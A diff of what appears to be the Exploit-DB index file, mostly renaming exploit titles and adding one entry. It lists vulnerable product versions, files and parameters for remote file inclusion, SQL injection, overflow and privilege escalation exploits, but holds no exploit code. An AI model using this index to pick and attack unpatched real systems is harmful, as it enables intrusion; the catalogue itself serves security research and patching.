+3024,platforms/windows/local/3024.c,"Microsoft Windows - NtRaiseHardError Csrss.exe Memory Disclosure",2006-12-27,"Ruben Santamarta ",windows,local,0 3025,platforms/php/webapps/3025.pl,"Yrch 1.0 - (plug.inc.php path Variable) Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps,0 3026,platforms/php/webapps/3026.txt,"Bubla 1.0.0rc2 - (bu/process.php) Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps,0 3027,platforms/php/webapps/3027.txt,"Fantastic News 2.1.4 - Multiple Remote File Inclusion",2006-12-27,Mr-m07,php,webapps,0 @@ -2709,8 +2709,8 @@ id,file,description,date,author,platform,type,port 3031,platforms/asp/webapps/3031.txt,"aFAQ 1.0 - (faqDsp.asp catcode) SQL Injection",2006-12-28,ajann,asp,webapps,0 3032,platforms/asp/webapps/3032.txt,"wywo inout board 1.0 - Multiple Vulnerabilities",2006-12-28,ajann,asp,webapps,0 3033,platforms/php/webapps/3033.txt,"phpBB2 Plus 1.53 - (Acronym Mod) SQL Injection",2006-12-28,"the master",php,webapps,0 -3034,platforms/windows/dos/3034.py,"AIDeX Mini-WebServer 1.1 - Remote Denial of Service Crash Exploit",2006-12-28,shinnai,windows,dos,0 -3035,platforms/asp/webapps/3035.txt,"ASPTicker 1.0 - (admin.asp) Login Bypass SQL Injection",2006-12-28,ajann,asp,webapps,0 +3034,platforms/windows/dos/3034.py,"AIDeX Mini-WebServer 1.1 - Remote Denial of Service Crash",2006-12-28,shinnai,windows,dos,0 +3035,platforms/asp/webapps/3035.txt,"ASPTicker 1.0 - (admin.asp) Login Bypass (SQL Injection)",2006-12-28,ajann,asp,webapps,0 3036,platforms/php/webapps/3036.php,"WebText 0.4.5.2 - Remote Code Execution",2006-12-28,Kacper,php,webapps,0 3037,platforms/windows/remote/3037.php,"Durian Web Application Server 3.02 - Remote Buffer Overflow",2006-12-29,rgod,windows,remote,4002 3038,platforms/windows/dos/3038.php,"Durian Web Application Server 3.02 - Denial of Service",2006-12-29,rgod,windows,dos,0 @@ -2744,7 +2744,7 @@ id,file,description,date,author,platform,type,port 3067,platforms/windows/remote/3067.txt,"QK SMTP 3.01 - (RCPT TO) Remote Buffer Overflow (Perl) (2)",2007-01-01,"Jacopo Cervini",windows,remote,25 3068,platforms/asp/webapps/3068.htm,"TaskTracker 1.5 - (Customize.asp) Remote Add Administrator Exploit",2007-01-01,ajann,asp,webapps,0 3069,platforms/osx/dos/3069.pl,"VLC Media Player 0.8.6 (PPC) - (udp://) Format String (PoC)",2007-01-02,MoAB,osx,dos,0 -3070,platforms/osx/local/3070.pl,"VLC Media Player 0.8.6 (x86) - (udp://) Format String Exploit",2007-01-02,MoAB,osx,local,0 +3070,platforms/osx/local/3070.pl,"VLC Media Player 0.8.6 (x86) - (udp://) Format String",2007-01-02,MoAB,osx,local,0 3071,platforms/windows/local/3071.c,"Microsoft Vista - (NtRaiseHardError) Privilege Escalation",2007-01-03,erasmus,windows,local,0 3072,platforms/windows/remote/3072.py,"Apple QuickTime (Windows 2000) - (rtsp URL Handler) Buffer Overflow",2007-01-03,"Winny Thomas",windows,remote,0 3073,platforms/asp/webapps/3073.txt,"LocazoList 2.01a beta5 - (subcatID) SQL Injection",2007-01-03,ajann,asp,webapps,0 @@ -2761,8 +2761,8 @@ id,file,description,date,author,platform,type,port 3084,platforms/windows/remote/3084.txt,"Adobe Acrobat Reader Plugin 7.0.x - (acroreader) Cross-Site Scripting",2007-01-05,"Stefano Di Paola",windows,remote,0 3085,platforms/php/webapps/3085.php,"Coppermine Photo Gallery 1.4.10 - 'xpl.php' SQL Injection",2007-01-05,DarkFig,php,webapps,0 3086,platforms/windows/remote/3086.py,"CA BrightStor ARCserve - 'tapeeng.exe' Remote Buffer Overflow",2007-01-05,"Winny Thomas",windows,remote,6502 -3087,platforms/osx/local/3087.rb,"Apple Mac OS X 10.4.8 - DiskManagement BOM Privilege Escalation",2007-01-05,MoAB,osx,local,0 -3088,platforms/osx/local/3088.rb,"Apple Mac OS X 10.4.8 - DiskManagement BOM (cron) Privilege Escalation",2007-01-05,MoAB,osx,local,0 +3087,platforms/osx/local/3087.rb,"Apple Mac OSX 10.4.8 - DiskManagement BOM Privilege Escalation",2007-01-05,MoAB,osx,local,0 +3088,platforms/osx/local/3088.rb,"Apple Mac OSX 10.4.8 - DiskManagement BOM (cron) Privilege Escalation",2007-01-05,MoAB,osx,local,0 3089,platforms/asp/webapps/3089.txt,"QUOTE&ORDERING SYSTEM 1.0 - (ordernum) Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0 3090,platforms/php/webapps/3090.txt,"NUNE News Script 2.0pre2 - Multiple Remote File Inclusion",2007-01-06,"Mehmet Ince",php,webapps,0 3091,platforms/php/webapps/3091.php,"L2J Statistik Script 0.09 - 'index.php' Local File Inclusion",2007-01-07,Codebreak,php,webapps,0 @@ -2773,24 +2773,24 @@ id,file,description,date,author,platform,type,port 3096,platforms/php/webapps/3096.txt,"AllMyLinks 0.5.0 - 'index.php' Remote File Inclusion",2007-01-07,GoLd_M,php,webapps,0 3097,platforms/php/webapps/3097.txt,"AllMyVisitors 0.4.0 - 'index.php' Remote File Inclusion",2007-01-07,bd0rk,php,webapps,0 3098,platforms/osx/dos/3098.html,"OmniWeb 5.5.1 - JavaScript alert() Remote Format String (PoC)",2007-01-07,MoAB,osx,dos,0 -3099,platforms/linux/remote/3099.pm,"Berlios GPSD 2.7 - Remote Format String Exploit (Metasploit)",2007-01-08,Enseirb,linux,remote,2947 -3100,platforms/php/webapps/3100.txt,"Magic Photo Storage Website - _config[site_path] File Include",2007-01-08,k1tk4t,php,webapps,0 +3099,platforms/linux/remote/3099.pm,"Berlios GPSD 2.7 - Remote Format String (Metasploit)",2007-01-08,Enseirb,linux,remote,2947 +3100,platforms/php/webapps/3100.txt,"Magic Photo Storage Website - _config[site_path] File Inclusion",2007-01-08,k1tk4t,php,webapps,0 3101,platforms/multiple/dos/3101.py,"Opera 9.10 - '.jpg' Image DHT Marker Heap Corruption Vulnerabilities",2007-01-08,posidron,multiple,dos,0 3102,platforms/osx/local/3102.rb,"Application Enhancer (APE) 2.0.2 - Privilege Escalation",2007-01-08,MoAB,osx,local,0 -3103,platforms/php/webapps/3103.php,"@lex Guestbook 4.0.2 - Remote Command Execution Exploit",2007-01-08,DarkFig,php,webapps,0 +3103,platforms/php/webapps/3103.php,"@lex Guestbook 4.0.2 - Remote Command Execution",2007-01-08,DarkFig,php,webapps,0 3104,platforms/php/webapps/3104.txt,"PPC Search Engine 1.61 - (INC) Multiple Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 3105,platforms/asp/webapps/3105.txt,"MOTIONBORG Web Real Estate 2.1 - SQL Injection",2007-01-09,ajann,asp,webapps,0 3106,platforms/php/webapps/3106.txt,"uniForum 4 - 'wbsearch.aspx' SQL Injection",2007-01-09,ajann,php,webapps,0 -3107,platforms/windows/remote/3107.pm,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow Exploit (Metasploit)",2007-01-09,"Jacopo Cervini",windows,remote,21 +3107,platforms/windows/remote/3107.pm,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (Metasploit)",2007-01-09,"Jacopo Cervini",windows,remote,21 3108,platforms/php/webapps/3108.pl,"Axiom Photo/News Gallery 0.8.6 - Remote File Inclusion",2007-01-09,DeltahackingTEAM,php,webapps,0 3109,platforms/php/webapps/3109.php,"WordPress 2.0.6 - wp-trackback.php SQL Injection",2007-01-10,rgod,php,webapps,0 -3110,platforms/osx/dos/3110.rb,"Apple Mac OS X 10.4.8 - Apple Finder DMG Volume Name Memory Corruption (PoC)",2007-01-09,MoAB,osx,dos,0 +3110,platforms/osx/dos/3110.rb,"Apple Mac OSX 10.4.8 - Apple Finder DMG Volume Name Memory Corruption (PoC)",2007-01-09,MoAB,osx,dos,0 3111,platforms/windows/dos/3111.pl,"Microsoft Windows - Explorer (.WMF) CreateBrushIndirect Denial of Service",2007-01-13,cyanid-E,windows,dos,0 3112,platforms/windows/dos/3112.py,"eIQnetworks Network Security Analyzer - Null Pointer Dereference Exploit",2007-01-10,"Ethan Hunt",windows,dos,0 3113,platforms/php/webapps/3113.txt,"Jshop Server 1.3 - (fieldValidation.php) Remote File Inclusion",2007-01-10,irvian,php,webapps,0 3114,platforms/php/webapps/3114.txt,"Article System 0.1 - (INCLUDE_DIR) Remote File Inclusion",2007-01-11,3l3ctric-Cracker,php,webapps,0 3115,platforms/asp/webapps/3115.txt,"vp-asp shopping cart 6.09 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2007-01-11,ajann,asp,webapps,0 -3116,platforms/php/webapps/3116.php,"sNews 1.5.30 - Remote Reset Admin Pass / Command Execution Exploit",2007-01-12,rgod,php,webapps,0 +3116,platforms/php/webapps/3116.php,"sNews 1.5.30 - Remote Reset Admin Pass / Command Execution",2007-01-12,rgod,php,webapps,0 3117,platforms/php/webapps/3117.txt,"LunarPoll 1.0 - (show.php PollDir) Remote File Inclusion",2007-01-12,"ilker Kandemir",php,webapps,0 3118,platforms/php/webapps/3118.txt,"TLM CMS 1.1 - (i-accueil.php chemin) Remote File Inclusion",2007-01-12,GoLd_M,php,webapps,0 3119,platforms/windows/dos/3119.py,"VLC Media Player 0.8.6a - Unspecified Denial of Service",2007-01-12,shinnai,windows,dos,0 @@ -2799,11 +2799,11 @@ id,file,description,date,author,platform,type,port 3122,platforms/asp/webapps/3122.pl,"DigiAffiliate 1.4 - (visu_user.asp id) SQL Injection",2007-01-13,ajann,asp,webapps,0 3123,platforms/php/webapps/3123.htm,"FdWeB Espace Membre 2.01 - (path) Remote File Inclusion",2007-01-13,ajann,php,webapps,0 3124,platforms/php/webapps/3124.php,"ThWboard 3.0b2.84-php5 - SQL Injection / Code Execution",2007-01-14,rgod,php,webapps,0 -3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - 'download.php' Remote File Disclosure Exploit",2007-01-14,PeTrO,php,webapps,0 +3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - 'download.php' Remote File Disclosure",2007-01-14,PeTrO,php,webapps,0 3126,platforms/windows/dos/3126.c,"WFTPD Pro Server 3.25 - Site ADMN Remote Denial of Service",2007-01-14,Marsu,windows,dos,0 3127,platforms/windows/dos/3127.c,"Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0 3128,platforms/windows/dos/3128.c,"BolinTech DreamFTP - (USER) Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0 -3130,platforms/osx/dos/3130.c,"Apple Mac OS X 10.4.8 - AppleTalk ATPsndrsp() Heap Buffer Overflow (PoC)",2007-01-14,MoAB,osx,dos,0 +3130,platforms/osx/dos/3130.c,"Apple Mac OSX 10.4.8 - AppleTalk ATPsndrsp() Heap Buffer Overflow (PoC)",2007-01-14,MoAB,osx,dos,0 3131,platforms/windows/local/3131.c,"Kaspersky AntiVirus 6.0 - Privilege Escalation",2007-01-15,MaD,windows,local,0 3132,platforms/windows/remote/3132.pl,"TFTPDWIN 0.4.2 - Remote Buffer Overflow",2007-01-15,"Jacopo Cervini",windows,remote,69 3133,platforms/windows/remote/3133.pl,"Mercur Messaging 2005 - IMAP Remote Buffer Overflow",2007-01-15,"Jacopo Cervini",windows,remote,143 @@ -2812,7 +2812,7 @@ id,file,description,date,author,platform,type,port 3137,platforms/windows/remote/3137.html,"Microsoft Internet Explorer - VML Remote Buffer Overflow (MS07-004)",2007-01-16,LifeAsaGeek,windows,remote,0 3138,platforms/windows/dos/3138.pl,"Twilight WebServer 1.3.3.0 - (GET) Remote Denial of Service",2003-07-07,anonymous,windows,dos,0 3139,platforms/osx/dos/3139.rb,"Colloquy 2.1.3545 - (INVITE) Format String Denial of Service",2007-01-17,MoAB,osx,dos,0 -3140,platforms/windows/remote/3140.pl,"Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow Exploit",2007-01-17,UmZ,windows,remote,21 +3140,platforms/windows/remote/3140.pl,"Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow",2007-01-17,UmZ,windows,remote,21 3141,platforms/php/webapps/3141.pl,"MGB 0.5.4.5 - (email.php id Variable) SQL Injection",2007-01-17,SlimTim10,php,webapps,0 3142,platforms/windows/dos/3142.html,"CCRP Folder Treeview Control (ccrpftv6.ocx) - IE Denial of Service",2007-01-17,shinnai,windows,dos,0 3143,platforms/php/webapps/3143.php,"Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (1)",2007-01-17,"silent vapor",php,webapps,0 @@ -2823,7 +2823,7 @@ id,file,description,date,author,platform,type,port 3148,platforms/windows/remote/3148.pl,"Microsoft Internet Explorer - VML Download and Execute Exploit (MS07-004)",2007-01-17,pang0,windows,remote,0 3149,platforms/windows/local/3149.cpp,"Microsoft Help Workshop 4.03.0002 - '.cnt' Buffer Overflow",2007-01-17,porkythepig,windows,local,0 3150,platforms/php/webapps/3150.txt,"Oreon 1.2.3 RC4 - (lang/index.php) Remote File Inclusion",2007-01-17,3l3ctric-Cracker,php,webapps,0 -3151,platforms/osx/dos/3151.rb,"Apple Mac OS X 10.4.8 - SLP Daemon Service Registration Buffer Overflow (PoC)",2007-01-18,MoAB,osx,dos,0 +3151,platforms/osx/dos/3151.rb,"Apple Mac OSX 10.4.8 - SLP Daemon Service Registration Buffer Overflow (PoC)",2007-01-18,MoAB,osx,dos,0 3152,platforms/php/webapps/3152.txt,"ComVironment 4.0 - (grab_globals.lib.php) Remote File Inclusion",2007-01-18,GoLd_M,php,webapps,0 3153,platforms/php/webapps/3153.php,"phpBP RC3 - (2.204) (SQL Injection / cmd) Remote Code Execution",2007-01-18,Kacper,php,webapps,0 3154,platforms/linux/local/3154.c,"GNU/Linux mbse-bbs 0.70.0 - Local Buffer Overflow",2007-01-18,prdelka,linux,local,0 @@ -2839,13 +2839,13 @@ id,file,description,date,author,platform,type,port 3164,platforms/php/webapps/3164.pl,"PHPIndexPage 1.0.1 - 'config.php' Remote File Inclusion",2007-01-20,DeltahackingTEAM,php,webapps,0 3165,platforms/php/webapps/3165.txt,"MySpeach 2.1b - (up.php) Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 3166,platforms/osx/dos/3166.html,"Apple iChat 3.1.6 441 - aim:// URL Handler Format String (PoC)",2007-01-21,MoAB,osx,dos,0 -3167,platforms/osx/dos/3167.c,"Apple Mac OS X 10.4.x - Kernel shared_region_map_file_np() Memory Corruption",2007-01-21,"Adriano Lima",osx,dos,0 -3168,platforms/windows/remote/3168.java,"Sun Microsystems Java - '.GIF' File Parsing Memory Corruption Exploit",2007-01-21,luoluo,windows,remote,0 +3167,platforms/osx/dos/3167.c,"Apple Mac OSX 10.4.x - Kernel shared_region_map_file_np() Memory Corruption",2007-01-21,"Adriano Lima",osx,dos,0 +3168,platforms/windows/remote/3168.java,"Sun Microsystems Java - '.GIF' File Parsing Memory Corruption",2007-01-21,luoluo,windows,remote,0 3169,platforms/php/webapps/3169.txt,"WebChat 0.77 - (defines.php WEBCHATPATH) Remote File Inclusion",2007-01-21,v1per-haCker,php,webapps,0 3170,platforms/windows/remote/3170.pm,"3Com TFTP Service 2.0.1 - Remote Buffer Overflow (Metasploit)",2007-01-21,Enseirb,windows,remote,69 3171,platforms/php/webapps/3171.pl,"Mafia Scum Tools 2.0.0 - (index.php gen) Remote File Inclusion",2007-01-21,DeltahackingTEAM,php,webapps,0 3172,platforms/php/webapps/3172.php,"webSPELL 4.01.02 - 'gallery.php' Blind SQL Injection",2007-01-21,r00t,php,webapps,0 -3173,platforms/osx/local/3173.rb,"Apple Mac OS X 10.4.8 - System Preferences Privilege Escalation",2007-01-21,MoAB,osx,local,0 +3173,platforms/osx/local/3173.rb,"Apple Mac OSX 10.4.8 - System Preferences Privilege Escalation",2007-01-21,MoAB,osx,local,0 3174,platforms/php/webapps/3174.txt,"Upload Service 1.0 - (top.php maindir) Remote File Inclusion",2007-01-21,y3dips,php,webapps,0 3175,platforms/php/webapps/3175.pl,"VisoHotlink 1.01 - functions.visohotlink.php Remote File Inclusion",2007-01-22,bd0rk,php,webapps,0 3176,platforms/windows/local/3176.cpp,"Microsoft Visual C++ - '.RC Resource Files' Local Buffer Overflow",2007-01-22,porkythepig,windows,local,0 @@ -2853,7 +2853,7 @@ id,file,description,date,author,platform,type,port 3178,platforms/multiple/local/3178.txt,"Oracle 10g - SYS.KUPW$WORKER.MAIN PL / SQL Injection",2007-01-23,"Joxean Koret",multiple,local,0 3179,platforms/multiple/local/3179.txt,"Oracle 10g - SYS.KUPV$FT.ATTACH_JOB PL / SQL Injection",2007-01-23,"Joxean Koret",multiple,local,0 3180,platforms/php/webapps/3180.pl,"Vote-Pro 4.0 - (poll_frame.php poll_id) Remote Code Execution",2007-01-23,r0ut3r,php,webapps,0 -3181,platforms/osx/local/3181.rb,"Apple Mac OS X 10.4.8 - 'UserNotificationCenter' Privilege Escalation",2007-01-23,MoAB,osx,local,0 +3181,platforms/osx/local/3181.rb,"Apple Mac OSX 10.4.8 - 'UserNotificationCenter' Privilege Escalation",2007-01-23,MoAB,osx,local,0 3182,platforms/windows/dos/3182.py,"Sami HTTP Server 2.0.1 - (HTTP 404 Object not found) Denial of Service",2007-01-23,shinnai,windows,dos,0 3183,platforms/php/webapps/3183.txt,"BBClone 0.31 - (selectlang.php) Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0 3184,platforms/php/webapps/3184.txt,"phpXD 0.3 - (path) Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0 @@ -2889,11 +2889,12 @@ id,file,description,date,author,platform,type,port 3216,platforms/php/webapps/3216.txt,"xNews 1.3 - (xNews.php) SQL Injection",2007-01-28,ajann,php,webapps,0 3217,platforms/php/webapps/3217.txt,"PHP Generic library & Framework - 'INCLUDE_PATH' Remote File Inclusion",2007-01-28,"Mehmet Ince",php,webapps,0 3218,platforms/windows/remote/3218.pl,"CA BrightStor ARCserve - (msgeng.exe) Remote Heap Overflow (2)",2007-01-28,"Jacopo Cervini",windows,remote,6503 -3219,platforms/osx/local/3219.rb,"Apple Mac OS X 10.4.8 (8L2127) - crashdump Privilege Escalation",2007-01-29,MoAB,osx,local,0 +3219,platforms/osx/local/3219.rb,"Apple Mac OSX 10.4.8 (8L2127) - crashdump Privilege Escalation",2007-01-29,MoAB,osx,local,0 3220,platforms/windows/local/3220.c,"Multiple Printer Providers (spooler service) - Privilege Escalation",2007-01-29,"Andres Tarasco",windows,local,0 3221,platforms/php/webapps/3221.php,"GuppY 4.5.16 - Remote Commands Execution Exploit",2007-01-29,rgod,php,webapps,0 3222,platforms/php/webapps/3222.txt,"Webfwlog 0.92 - (debug.php) Remote File Disclosure",2007-01-29,GoLd_M,php,webapps,0 -3223,platforms/cgi/dos/3223.pl,"CVSTrac 2.0.0 - Post-Attack Database Resurrection Denial of Service",2007-01-29,"Ralf S. Engelschall",cgi,dos,0 +3223,platforms/cgi/dos/3223.pl,"CVSTrac 2.0.0 - Defacement Denial of Service",2007-01-29,"Ralf S. Engelschall",cgi,dos,0 +40341,platforms/windows/local/40341.txt,"Multiple Applications - Local Credentials Disclosure",2016-09-07,"Yakir Wizman",windows,local,0 3224,platforms/windows/dos/3224.c,"Intel 2200BG 802.11 - disassociation packet Kernel Memory Corruption",2007-01-29,"Breno Silva Pinto",windows,dos,0 3225,platforms/php/webapps/3225.pl,"Galeria Zdjec 3.0 - (zd_numer.php) Local File Inclusion",2007-01-30,ajann,php,webapps,0 3226,platforms/php/webapps/3226.txt,"PHPFootball 1.6 - (show.php) Remote Database Disclosure",2007-01-30,ajann,php,webapps,0 @@ -2944,7 +2945,7 @@ id,file,description,date,author,platform,type,port 3271,platforms/php/webapps/3271.php,"GGCMS 1.1.0 RC1 - Remote Code Execution",2007-02-05,Kacper,php,webapps,0 3272,platforms/windows/dos/3272.html,"Microsoft Internet Explorer 6 - 'mshtml.dll' Null Pointer Dereference Exploit",2007-02-05,AmesianX,windows,dos,0 3273,platforms/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - (ps) Information Leak Exploit",2007-02-06,bunker,tru64,local,0 -3274,platforms/windows/remote/3274.txt,"MySQL 4.x/5.0 (Windows) - User-Defined Function (UDF) Command Execution Exploit",2007-02-06,"Marco Ivaldi",windows,remote,3306 +3274,platforms/windows/remote/3274.txt,"MySQL 4.x/5.0 (Windows) - User-Defined Function (UDF) Command Execution",2007-02-06,"Marco Ivaldi",windows,remote,3306 3275,platforms/php/webapps/3275.txt,"LightRO CMS 1.0 - (inhalt.php) Remote File Inclusion",2007-02-06,ajann,php,webapps,0 3276,platforms/windows/dos/3276.cpp,"FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow Denial of Service",2007-02-06,Marsu,windows,dos,0 3277,platforms/windows/dos/3277.cpp,"SmartFTP Client 2.0.1002 - Remote Heap Overflow Denial of Service",2007-02-06,Marsu,windows,dos,0 @@ -2961,9 +2962,9 @@ id,file,description,date,author,platform,type,port 3288,platforms/php/webapps/3288.asp,"LushiWarPlaner 1.0 - (register.php) SQL Injection",2007-02-08,ajann,php,webapps,0 3289,platforms/linux/dos/3289.c,"Axigen 2.0.0b1 - Remote Denial of Service (1)",2007-02-08,mu-b,linux,dos,0 3290,platforms/linux/dos/3290.c,"Axigen 2.0.0b1 - Remote Denial of Service (2)",2007-02-08,mu-b,linux,dos,0 -3291,platforms/windows/remote/3291.pl,"SAP Web Application Server 6.40 - Arbitrary File Disclosure Exploit",2007-02-08,Nicob,windows,remote,0 +3291,platforms/windows/remote/3291.pl,"SAP Web Application Server 6.40 - Arbitrary File Disclosure",2007-02-08,Nicob,windows,remote,0 3292,platforms/php/webapps/3292.txt,"OPENi-CMS Site Protection Plugin - Remote File Inclusion",2007-02-11,y3dips,php,webapps,0 -3293,platforms/solaris/remote/3293.sh,"SunOS 5.10/5.11 - in.TelnetD Remote Authentication Bypass Exploit",2007-02-11,kingcope,solaris,remote,23 +3293,platforms/solaris/remote/3293.sh,"SunOS 5.10/5.11 - in.TelnetD Remote Authentication Bypass",2007-02-11,kingcope,solaris,remote,23 3294,platforms/hardware/remote/3294.txt,"IP3 NetAccess < 4.1.9.6 - Arbitrary File Disclosure",2007-02-11,"Sebastian Wolfgarten",hardware,remote,80 3295,platforms/asp/webapps/3295.txt,"philboard 1.14 - (philboard_forum.asp) SQL Injection",2007-02-12,"Mehmet Ince",asp,webapps,0 3296,platforms/windows/remote/3296.c,"uTorrent 1.6 build 474 - (announce) Key Remote Heap Overflow",2007-02-12,defsec,windows,remote,0 @@ -2981,9 +2982,9 @@ id,file,description,date,author,platform,type,port 3308,platforms/windows/dos/3308.pl,"MailEnable Professional/Enterprise 2.37 - Denial of Service",2007-02-14,mu-b,windows,dos,0 3309,platforms/php/webapps/3309.txt,"Jupiter CMS 1.1.5 - 'index.php' Remote / Local File Inclusion",2007-02-14,DarkFig,php,webapps,0 3310,platforms/php/webapps/3310.php,"Jupiter CMS 1.1.5 - (Client-IP) SQL Injection",2007-02-14,DarkFig,php,webapps,0 -3311,platforms/php/webapps/3311.php,"Jupiter CMS 1.1.5 - Remote File Upload Exploit",2007-02-14,DarkFig,php,webapps,0 -3312,platforms/php/webapps/3312.pl,"Drupal < 5.1 - (post comments) Remote Command Execution Exploit (2)",2007-02-15,str0ke,php,webapps,0 -3313,platforms/php/webapps/3313.pl,"Drupal < 4.7.6 - (post comments) Remote Command Execution Exploit (2)",2007-02-15,str0ke,php,webapps,0 +3311,platforms/php/webapps/3311.php,"Jupiter CMS 1.1.5 - Arbitrary File Upload",2007-02-14,DarkFig,php,webapps,0 +3312,platforms/php/webapps/3312.pl,"Drupal < 5.1 - (post comments) Remote Command Execution (2)",2007-02-15,str0ke,php,webapps,0 +3313,platforms/php/webapps/3313.pl,"Drupal < 4.7.6 - (post comments) Remote Command Execution (2)",2007-02-15,str0ke,php,webapps,0 3314,platforms/php/webapps/3314.txt,"ZebraFeeds 1.0 - (zf_path) Remote File Inclusion",2007-02-15,"ThE dE@Th",php,webapps,0 3315,platforms/php/webapps/3315.txt,"nabopoll 1.2 - (survey.inc.php path) Remote File Inclusion",2007-02-15,Cr@zy_King,php,webapps,0 3317,platforms/asp/webapps/3317.txt,"CodeAvalanche News 1.x - (CAT_ID) SQL Injection",2007-02-15,beks,asp,webapps,0 @@ -2998,16 +2999,16 @@ id,file,description,date,author,platform,type,port 3326,platforms/php/webapps/3326.txt,"Vivvo Article Manager 3.4 - (root) Local File Inclusion",2007-02-16,Snip0r,php,webapps,0 3327,platforms/php/webapps/3327.txt,"XLAtunes 0.1 - (album) SQL Injection",2007-02-17,Bl0od3r,php,webapps,0 3328,platforms/php/webapps/3328.htm,"S-Gastebuch 1.5.3 - (gb_pfad) Remote File Inclusion",2007-02-18,ajann,php,webapps,0 -3329,platforms/linux/remote/3329.c,"Axigen eMail Server 2.0.0b2 - (pop3) Remote Format String Exploit",2007-02-18,fuGich,linux,remote,110 +3329,platforms/linux/remote/3329.c,"Axigen eMail Server 2.0.0b2 - (pop3) Remote Format String",2007-02-18,fuGich,linux,remote,110 3330,platforms/linux/local/3330.pl,"ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (1)",2007-02-18,Revenge,linux,local,0 3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 - (CWD) Remote Buffer Overflow (PoC)",2007-02-18,r0ut3r,windows,dos,0 -3332,platforms/php/webapps/3332.pl,"Xpression News 1.0.1 - (archives.php) Remote File Disclosure Exploit",2007-02-18,r0ut3r,php,webapps,0 +3332,platforms/php/webapps/3332.pl,"Xpression News 1.0.1 - (archives.php) Remote File Disclosure",2007-02-18,r0ut3r,php,webapps,0 3333,platforms/linux/local/3333.pl,"ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (2)",2007-02-19,Revenge,linux,local,0 3334,platforms/php/webapps/3334.asp,"PHP-Nuke Module Emporium 2.3.0 - SQL Injection",2007-02-19,ajann,php,webapps,0 3335,platforms/windows/remote/3335.pm,"IPSwitch WS-FTP 5.05 - (XMD5) Remote Buffer Overflow (Metasploit)",2007-02-19,"Jacopo Cervini",windows,remote,21 3336,platforms/php/webapps/3336.txt,"Ultimate Fun Book 1.02 - (function.php) Remote File Inclusion",2007-02-20,kezzap66345,php,webapps,0 3337,platforms/php/webapps/3337.php,"NukeSentinel 2.5.05 - (nsbypass.php) Blind SQL Injection",2007-02-20,DarkFig,php,webapps,0 -3338,platforms/php/webapps/3338.php,"NukeSentinel 2.5.05 - (nukesentinel.php) File Disclosure Exploit",2007-02-20,DarkFig,php,webapps,0 +3338,platforms/php/webapps/3338.php,"NukeSentinel 2.5.05 - (nukesentinel.php) File Disclosure",2007-02-20,DarkFig,php,webapps,0 3339,platforms/asp/webapps/3339.txt,"Online Web Building 2.0 - 'id' SQL Injection",2007-02-20,"Mehmet Ince",asp,webapps,0 3340,platforms/windows/remote/3340.html,"Mozilla Firefox 2.0.0.1 - (location.hostname) Cross-Domain",2007-02-20,"Michal Zalewski",windows,remote,0 3341,platforms/windows/dos/3341.cpp,"TurboFTP 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service",2007-02-20,Marsu,windows,dos,0 @@ -3016,7 +3017,7 @@ id,file,description,date,author,platform,type,port 3344,platforms/php/webapps/3344.pl,"PHP-Nuke 8.0 Final - (INSERT) Blind SQL Injection (MySQL)",2007-02-20,krasza,php,webapps,0 3345,platforms/php/webapps/3345.pl,"PHP-Nuke 8.0 Final - (INSERT) SQL Injection",2007-02-20,krasza,php,webapps,0 3346,platforms/php/webapps/3346.pl,"PHP-Nuke 8.0 Final - (HTTP Referers) SQL Injection",2007-02-20,krasza,php,webapps,0 -3347,platforms/windows/dos/3347.cpp,"FTP Explorer 1.0.1 Build 047 - (CPU consumption) Remote Denial of Service",2007-02-20,Marsu,windows,dos,0 +3347,platforms/windows/dos/3347.cpp,"FTP Explorer 1.0.1 Build 047 - (CPU Consumption) Remote Denial of Service",2007-02-20,Marsu,windows,dos,0 3348,platforms/php/webapps/3348.txt,"SendStudio 2004.14 - (ROOTDIR) Remote File Inclusion",2007-02-20,K-159,php,webapps,0 3349,platforms/windows/local/3349.c,"News Bin Pro 5.33 - '.nbi' Local Buffer Overflow",2007-02-21,Marsu,windows,local,0 3350,platforms/windows/dos/3350.html,"BrowseDialog Class - 'ccrpbds6.dll' Multiple Methods Denial of Service",2007-02-21,shinnai,windows,dos,0 @@ -3061,18 +3062,18 @@ id,file,description,date,author,platform,type,port 3390,platforms/asp/webapps/3390.txt,"Angel Lms 7.1 - (default.asp id) SQL Injection",2007-03-01,"Craig Heffner",asp,webapps,0 3391,platforms/windows/remote/3391.py,"Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-01,"Trirat Puttaraksa",windows,remote,0 3392,platforms/windows/dos/3392.html,"DivX Web Player 1.3.0 - (npdivx32.dll) Remote Denial of Service",2007-03-01,shinnai,windows,dos,0 -3393,platforms/php/webapps/3393.php,"phpMyFAQ 1.6.7 - SQL Injection / Command Execution Exploit",2007-03-01,elgCrew,php,webapps,0 +3393,platforms/php/webapps/3393.php,"phpMyFAQ 1.6.7 - SQL Injection / Command Execution",2007-03-01,elgCrew,php,webapps,0 3394,platforms/multiple/dos/3394.php,"PHP 4 - Userland ZVAL Reference Counter Overflow (PoC)",2007-03-01,"Stefan Esser",multiple,dos,0 3395,platforms/windows/remote/3395.c,"WebMod 0.48 - (Content-Length) Remote Buffer Overflow (PoC)",2007-03-01,cybermind,windows,remote,0 